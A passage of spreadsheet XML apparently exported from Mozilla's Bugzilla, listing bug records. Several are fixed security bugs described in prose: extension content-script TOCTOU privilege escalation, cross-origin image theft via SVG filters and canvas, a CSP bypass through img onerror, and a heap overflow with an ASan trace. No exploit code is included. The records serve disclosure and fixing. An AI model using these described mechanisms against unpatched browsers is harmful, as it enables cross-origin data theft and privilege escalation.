      <c r="U6426" t="n">
        <v>0</v>
      </c>
      <c r="V6426" t="n">
        <v>5</v>
      </c>
      <c r="W6426" t="inlineStr">
        <is>
          <t>It's so shiny and stable!</t>
        </is>
      </c>
      <c r="X6426" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6427">
      <c r="A6427" t="n">
        <v>1483602</v>
      </c>
      <c r="B6427" t="inlineStr">
        <is>
          <t>2018-08-15 09:42:01 -0700</t>
        </is>
      </c>
      <c r="C6427" t="inlineStr">
        <is>
          <t>Extensions can run content scripts anywhere when the document navigates during content script execution</t>
        </is>
      </c>
      <c r="D6427" t="inlineStr">
        <is>
          <t>2024-04-22 10:51:27 -0700</t>
        </is>
      </c>
      <c r="E6427" t="n">
        <v>1</v>
      </c>
      <c r="F6427" t="n">
        <v>1</v>
      </c>
      <c r="G6427" t="n">
        <v>3</v>
      </c>
      <c r="H6427" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6427" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J6427" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6427" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6427" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6427" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6427" t="inlineStr">
        <is>
          <t>[adv-main63+][adv-esr60.3+]</t>
        </is>
      </c>
      <c r="Q6427" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6427" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6427" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T6427" t="n">
        <v>1</v>
      </c>
      <c r="U6427" t="n">
        <v>0</v>
      </c>
      <c r="V6427" t="n">
        <v>23</v>
      </c>
      <c r="W6427" t="inlineStr">
        <is>
          <t>There are multiple TOCOU bugs in extension the scheduler of extension content scripts that allow extensions to run content scripts in principals that it should not have access to.
TOCTOU bug 1:
When an extension is just installed, or when a content process starts up,
injectExtensionScripts is called to run content scripts in existing pages.
https://searchfox.org/mozilla-central/rev/2466b82b/toolkit/components/extensions/extension-process-script.js#202-221
It first checks matchesWindow and then runs scripts in three batches, document_start, document_end and document_idle. There is no guarantee that the inner window has not changed.
TOCTOU bug 2:
When a new document is loaded, ExtensionPolicyService::CheckContentScripts checks whether a script should run via script-&gt;Matches(aDocInfo), and then loads a script via loadContentScript:
https://searchfox.org/mozilla-central/rev/2466b82b/toolkit/components/extensions/ExtensionPolicyService.cpp#338-354
https://searchfox.org/mozilla-central/rev/2466b82b/toolkit/components/extensions/extension-process-script.js#499-503
The problem is that aDocInfo has a fixed value, while the document is not guaranteed to have a constant value.
TOCTOU bug 3:
When a dynamic content script is executed (via "Extension:Execute" message), there is no check that the extension is still valid (i.e. not disabled or reloaded). Consequently, it is possible for a dynamic content script to execute after having uninstalled an add-on.
https://searchfox.org/mozilla-central/rev/2466b82b/toolkit/components/extensions/ExtensionContent.jsm#865-876
In short:
- TOCTOU bug 1 and 2 allows extensions to escalate privileges.
- TOCTOU 3 allows extensions to run code after an extension is disabled (any of these bug do).
Bug 1 was introduced in Firefox 57 by https://hg.mozilla.org/mozilla-central/rev/ce17d1d232f1
Bug 2 was introduced in Firefox 55 by https://hg.mozilla.org/mozilla-central/rev/32a3b7c39207
ESR 52 is not affected (tested with 52.9), ESR 60 and current release branches are affected.</t>
        </is>
      </c>
      <c r="X6427" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6428">
      <c r="A6428" t="n">
        <v>376427</v>
      </c>
      <c r="B6428" t="inlineStr">
        <is>
          <t>2007-04-03 17:33:49 -0700</t>
        </is>
      </c>
      <c r="C6428" t="inlineStr">
        <is>
          <t>Exported XML files contain the incorrect status and resolution</t>
        </is>
      </c>
      <c r="D6428" t="inlineStr">
        <is>
          <t>2007-07-07 04:01:41 -0700</t>
        </is>
      </c>
      <c r="E6428" t="n">
        <v>1</v>
      </c>
      <c r="F6428" t="n">
        <v>1</v>
      </c>
      <c r="G6428" t="n">
        <v>4</v>
      </c>
      <c r="H6428" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6428" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6428" t="inlineStr">
        <is>
          <t>Bug Import/Export &amp; Moving</t>
        </is>
      </c>
      <c r="K6428" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="L6428" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6428" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6428" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6428" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6428" t="inlineStr"/>
      <c r="Q6428" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6428" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6428" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T6428" t="n">
        <v>1</v>
      </c>
      <c r="U6428" t="n">
        <v>0</v>
      </c>
      <c r="V6428" t="n">
        <v>5</v>
      </c>
      <c r="W6428" t="inlineStr">
        <is>
          <t>In 3.0 RC1, exporting a bug keeps its original status and resolution, as expected. In 3.1, all exported bugs have a status and resolution of RESOLVED MOVED, probably because bug 372700 updates bugs before building the XML file.</t>
        </is>
      </c>
      <c r="X6428" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6429">
      <c r="A6429" t="n">
        <v>1559715</v>
      </c>
      <c r="B6429" t="inlineStr">
        <is>
          <t>2019-06-16 13:40:28 -0700</t>
        </is>
      </c>
      <c r="C6429" t="inlineStr">
        <is>
          <t>Cross-origin image stealing using SVG filters and canvas</t>
        </is>
      </c>
      <c r="D6429" t="inlineStr">
        <is>
          <t>2024-05-30 10:00:17 -0700</t>
        </is>
      </c>
      <c r="E6429" t="n">
        <v>1</v>
      </c>
      <c r="F6429" t="n">
        <v>1</v>
      </c>
      <c r="G6429" t="n">
        <v>3</v>
      </c>
      <c r="H6429" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6429" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6429" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K6429" t="inlineStr">
        <is>
          <t>69 Branch</t>
        </is>
      </c>
      <c r="L6429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6429" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6429" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6429" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.1+][adv-esr60.9+]</t>
        </is>
      </c>
      <c r="Q6429" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6429" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6429" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T6429" t="n">
        <v>1</v>
      </c>
      <c r="U6429" t="n">
        <v>0</v>
      </c>
      <c r="V6429" t="n">
        <v>47</v>
      </c>
      <c r="W6429" t="inlineStr">
        <is>
          <t>Created attachment 9072463
proof of concept
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
Steps to reproduce:
Cross-origin images introduce a 'taint' into things like canvas and SVG filters to prevent image stealing. However, images in SVG load slightly differently than normal &lt;img&gt; elements. Images in SVG documents will display from the cache first, then re-display after revalidating with the server. It seems that the taint isn't introduced until the server has responded (e.g. with a 304 Not Modified). Before this happens, it's possible to use the image in ways that would normally fail or cause a security exception. Normal HTML images don't seem to behave in this way - they don't display at all until they've been revalidated.
The attached testcase has an SVG filter that uses feImage to load a cross-origin image. It than uses CanvasRenderingContext2D.filter to apply the filter to a canvas and toDataURI to copy the image data. On first load  toDataURI call causes an error because the image isn't cached. If you refresh the page, toDataURI works and gets a copy of the cross-origin image, due to the tainting delay.
Actual results:
Can use a cross-origin image from SVG without triggering tainting
Expected results:
Taint should apply even when image is displayed from cache, before revalidation</t>
        </is>
      </c>
      <c r="X6429" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6430">
      <c r="A6430" t="n">
        <v>751422</v>
      </c>
      <c r="B6430" t="inlineStr">
        <is>
          <t>2012-05-02 16:49:11 -0700</t>
        </is>
      </c>
      <c r="C6430" t="inlineStr">
        <is>
          <t>&lt;img onerror="..."&gt; execute even when inline scripts are blocked by CSP</t>
        </is>
      </c>
      <c r="D6430" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:58 -0700</t>
        </is>
      </c>
      <c r="E6430" t="n">
        <v>1</v>
      </c>
      <c r="F6430" t="n">
        <v>1</v>
      </c>
      <c r="G6430" t="n">
        <v>3</v>
      </c>
      <c r="H6430" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6430" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6430" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6430" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6430" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6430" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6430" t="inlineStr">
        <is>
          <t>[sg:high][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q6430" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6430" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6430" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6430" t="n">
        <v>1</v>
      </c>
      <c r="U6430" t="n">
        <v>0</v>
      </c>
      <c r="V6430" t="n">
        <v>43</v>
      </c>
      <c r="W6430" t="inlineStr">
        <is>
          <t>See http://dvcs.w3.org/hg/webappsec/file/tip/tests/csp/submitted/webkit/CSP_default-src-inline-allowed.php
I also reported this in person at the W3C WebAppSec working group face-to-face.</t>
        </is>
      </c>
      <c r="X6430" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6431">
      <c r="A6431" t="n">
        <v>809674</v>
      </c>
      <c r="B6431" t="inlineStr">
        <is>
          <t>2012-11-07 16:28:20 -0800</t>
        </is>
      </c>
      <c r="C6431" t="inlineStr">
        <is>
          <t>Crash with TimeEvent.view</t>
        </is>
      </c>
      <c r="D6431" t="inlineStr">
        <is>
          <t>2013-05-22 17:26:29 -0700</t>
        </is>
      </c>
      <c r="E6431" t="n">
        <v>1</v>
      </c>
      <c r="F6431" t="n">
        <v>1</v>
      </c>
      <c r="G6431" t="n">
        <v>3</v>
      </c>
      <c r="H6431" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6431" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6431" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K6431" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6431" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6431" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6431" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6431" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6431" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q6431" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6431" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6431" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T6431" t="n">
        <v>1</v>
      </c>
      <c r="U6431" t="n">
        <v>0</v>
      </c>
      <c r="V6431" t="n">
        <v>44</v>
      </c>
      <c r="W6431" t="inlineStr">
        <is>
          <t>Created attachment 679442
testcase
This is similar to bug 805749, but with TimeEvents instead of UIEvents.</t>
        </is>
      </c>
      <c r="X6431" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6432">
      <c r="A6432" t="n">
        <v>712572</v>
      </c>
      <c r="B6432" t="inlineStr">
        <is>
          <t>2011-12-21 00:38:58 -0800</t>
        </is>
      </c>
      <c r="C6432" t="inlineStr">
        <is>
          <t>hang forever in bilibili.tv since 20111220 nightly</t>
        </is>
      </c>
      <c r="D6432" t="inlineStr">
        <is>
          <t>2022-09-13 12:03:58 -0700</t>
        </is>
      </c>
      <c r="E6432" t="n">
        <v>1</v>
      </c>
      <c r="F6432" t="n">
        <v>1</v>
      </c>
      <c r="G6432" t="n">
        <v>3</v>
      </c>
      <c r="H6432" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6432" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6432" t="inlineStr">
        <is>
          <t>Networking: WebSockets</t>
        </is>
      </c>
      <c r="K6432" t="inlineStr">
        <is>
          <t>11 Branch</t>
        </is>
      </c>
      <c r="L6432" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6432" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6432" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6432" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6432" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q6432" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6432" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6432" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6432" t="n">
        <v>1</v>
      </c>
      <c r="U6432" t="n">
        <v>0</v>
      </c>
      <c r="V6432" t="n">
        <v>57</v>
      </c>
      <c r="W6432" t="inlineStr">
        <is>
          <t>STR:
open http://www.bilibili.tv/
stay a minute, hang, firefox.exe process take more and more memory.
Win 7 sp1 32bit
2011-12-19 nightly was fine.
It's any difference in 12a1&amp;11a1 of 20121220 nightly?</t>
        </is>
      </c>
      <c r="X6432" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6433">
      <c r="A6433" t="n">
        <v>737875</v>
      </c>
      <c r="B6433" t="inlineStr">
        <is>
          <t>2012-03-21 08:12:29 -0700</t>
        </is>
      </c>
      <c r="C6433" t="inlineStr">
        <is>
          <t>OOM Crash [@ nsQueryInterfaceWithError::operator] trying to execute random memory</t>
        </is>
      </c>
      <c r="D6433" t="inlineStr">
        <is>
          <t>2015-10-16 11:38:02 -0700</t>
        </is>
      </c>
      <c r="E6433" t="n">
        <v>1</v>
      </c>
      <c r="F6433" t="n">
        <v>1</v>
      </c>
      <c r="G6433" t="n">
        <v>3</v>
      </c>
      <c r="H6433" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6433" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6433" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K6433" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6433" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6433" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6433" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6433" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6433" t="inlineStr">
        <is>
          <t>[sg:high][qa-]</t>
        </is>
      </c>
      <c r="Q6433" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6433" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6433" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T6433" t="n">
        <v>1</v>
      </c>
      <c r="U6433" t="n">
        <v>0</v>
      </c>
      <c r="V6433" t="n">
        <v>15</v>
      </c>
      <c r="W6433" t="inlineStr">
        <is>
          <t>Created attachment 607962
Log with failed allocations
+++ This bug was initially created as a clone of Bug #733047 +++
Tested on m-c revision 08809a43e082: During OOM testing for bug 737129 I got a crash shown in the attached log. The trace is very similar to that in bug 733047 but we're not trying to execute NULL here but random memory.
The log shows 6 failed allocations before the crash, and the crash location (address) varies (I had, "(bad)" and "Cannot access memory at", as well as random instructions).
Could it be that one of the failed allocations leaves a pointer uninitialized here?</t>
        </is>
      </c>
      <c r="X6433" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6434">
      <c r="A6434" t="n">
        <v>1717922</v>
      </c>
      <c r="B6434" t="inlineStr">
        <is>
          <t>2021-06-23 13:49:51 -0700</t>
        </is>
      </c>
      <c r="C6434" t="inlineStr">
        <is>
          <t>AddressSanitizer: out-of-bounds read and SEGV in nsLineBox::GetChildCount()</t>
        </is>
      </c>
      <c r="D6434" t="inlineStr">
        <is>
          <t>2024-05-30 10:33:53 -0700</t>
        </is>
      </c>
      <c r="E6434" t="n">
        <v>1</v>
      </c>
      <c r="F6434" t="n">
        <v>1</v>
      </c>
      <c r="G6434" t="n">
        <v>3</v>
      </c>
      <c r="H6434" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6434" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6434" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K6434" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6434" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6434" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6434" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6434" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6434" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main91+][adv-esr78.13+]</t>
        </is>
      </c>
      <c r="Q6434" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6434" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S6434" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T6434" t="n">
        <v>1</v>
      </c>
      <c r="U6434" t="n">
        <v>0</v>
      </c>
      <c r="V6434" t="n">
        <v>48</v>
      </c>
      <c r="W6434" t="inlineStr">
        <is>
          <t>Created attachment 9228632
bof-interesting.html
When Accesibility `Activated: true` on `about:support` then after visit the bof-interesting.html, the tab immediately crashed with heap-buffer-overflow in `nsLineBox::GetChildCount()`.
Interestingly when minimizing the testcase with Lithium I got some different ASan report:
- heap-buffer-overflow with READ size of 2
- SEGV on unknown address `0x00a57fff8003` or `0x00a6ffff8002 `
- access-violation on unknown address `0x0241fd38002` (on Windows 10)
- use-after-poison with READ size of 2
Mozregression show it is regression of [Bug 1542807 - Remove legacy layout code path for ::marker (nsBulletFrame)](https://bugzilla.mozilla.org/show_bug.cgi?id=1542807).
## Steps to reproduce:
1. Open Screen Reader (e.g. Microsoft Narrator, Orca on Linux, or VoiceOver on macOS) 
2. Open Firefox Nightly or Firefox ASan
3. Visit attached bof-interesting.html
4. Tab crashed with heap-buffer-overflow (on Linux) or access-violation (on Windows 10)
## ASan output:
```
=================================================================
==527348==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500020510c at pc 0x7fa831a45f09 bp 0x7fff0e24db40 sp 0x7fff0e24db38
READ of size 2 at 0x62500020510c thread T0 (file:// Content)
    #0 0x7fa831a45f08 in nsLineBox::GetChildCount() const /builds/worker/checkouts/gecko/layout/generic/nsLineBox.h:322:12
    #1 0x7fa831d96aa9 in BuildTextRuns /builds/worker/checkouts/gecko/layout/generic/nsTextFrame.cpp:1517:28
    #2 0x7fa831d96aa9 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/worker/checkouts/gecko/layout/generic/nsTextFrame.cpp:2991:7
    #3 0x7fa831da326a in nsTextFrame::GetRenderedText(unsigned int, unsigned int, nsIFrame::TextOffsetType, nsIFrame::TrailingWhitespace) /builds/worker/checkouts/gecko/layout/generic/nsTextFrame.cpp:9895:20
    #4 0x7fa8349b7ee3 in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /builds/worker/checkouts/gecko/accessible/base/NotificationController.cpp:685:46
    #5 0x7fa8318f9159 in nsRefreshDriver::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp, nsRefreshDriver::IsExtraTick) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:2240:12
    #6 0x7fa831905d67 in TickDriver /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:348:13
    #7 0x7fa831905d67 in mozilla::RefreshDriverTimer::TickRefreshDrivers(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:326:7
    #8 0x7fa831905acd in mozilla::RefreshDriverTimer::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:342:5
    #9 0x7fa831905855 in mozilla::VsyncRefreshDriverTimer::RunRefreshDrivers(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:775:5
    #10 0x7fa831904e5f in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:704:16
    #11 0x7fa83190441b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyParentProcessVsync() /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:617:7
    #12 0x7fa831903b91 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::VsyncEvent const&amp;) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:538:9
    #13 0x7fa830badb8f in mozilla::dom::VsyncChild::RecvNotify(mozilla::VsyncEvent const&amp;, float const&amp;) /builds/worker/checkouts/gecko/dom/ipc/VsyncChild.cpp:68:15
    #14 0x7fa82bae214c in mozilla::dom::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PVsyncChild.cpp:178:54
    #15 0x7fa82b892f1f in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PBackgroundChild.cpp:6091:32
    #16 0x7fa82b4b1616 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2085:25
    #17 0x7fa82b4af10c in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2012:9
    #18 0x7fa82b4b031e in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1860:3
    #19 0x7fa82b4b0a9b in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1891:13
    #20 0x7fa82a3dce22 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:502:16
    #21 0x7fa82a3a9940 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:805:26
    #22 0x7fa82a3a7188 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:641:15
    #23 0x7fa82a3a789d in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:425:36
    #24 0x7fa82a3e7101 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:135:37
    #25 0x7fa82a3e7101 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:534:5
    #26 0x7fa82a3c4298 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1152:16
    #27 0x7fa82a3cf0dc in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
    #28 0x7fa82b4b824a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
    #29 0x7fa82b3c42b1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #30 0x7fa82b3c42b1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #31 0x7fa82b3c42b1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #32 0x7fa83140a4e7 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
    #33 0x7fa8352fe60f in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:910:20
    #34 0x7fa82b3c42b1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #35 0x7fa82b3c42b1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #36 0x7fa82b3c42b1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #37 0x7fa8352fdfe4 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:742:34
    #38 0x55e44770742d in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #39 0x55e447707851 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327:18
    #40 0x7fa846c3cb24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
    #41 0x55e44765874c in _start (/tmp/m-c-20210623155828-asan-opt/firefox+0x5674c)
0x62500020510c is located 12 bytes to the right of 8192-byte region [0x625000203100,0x625000205100)
allocated by thread T0 (file:// Content) here:
    #0 0x55e4476d37ad in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
    #1 0x7fa82a385fa0 in mozilla::ArenaAllocator&lt;8192ul, 8ul&gt;::AllocateChunk(unsigned long) /builds/worker/workspace/obj-build/dist/include/mozilla/ArenaAllocator.h:170:15
    #2 0x7fa831a9b3bd in InternalAllocate /builds/worker/workspace/obj-build/dist/include/mozilla/ArenaAllocator.h:204:25
    #3 0x7fa831a9b3bd in Allocate /builds/worker/workspace/obj-build/dist/include/mozilla/ArenaAllocator.h:66:12
    #4 0x7fa831a9b3bd in mozilla::ArenaAllocator&lt;8192ul, 8ul&gt;::Allocate(unsigned long) /builds/worker/workspace/obj-build/dist/include/mozilla/ArenaAllocator.h:70:15
    #5 0x7fa831b13f55 in AllocateByObjectID /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:271:32
    #6 0x7fa831b13f55 in AllocateFrame /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:263:12
    #7 0x7fa831b13f55 in operator new /builds/worker/checkouts/gecko/layout/generic/ViewportFrame.cpp:36:1
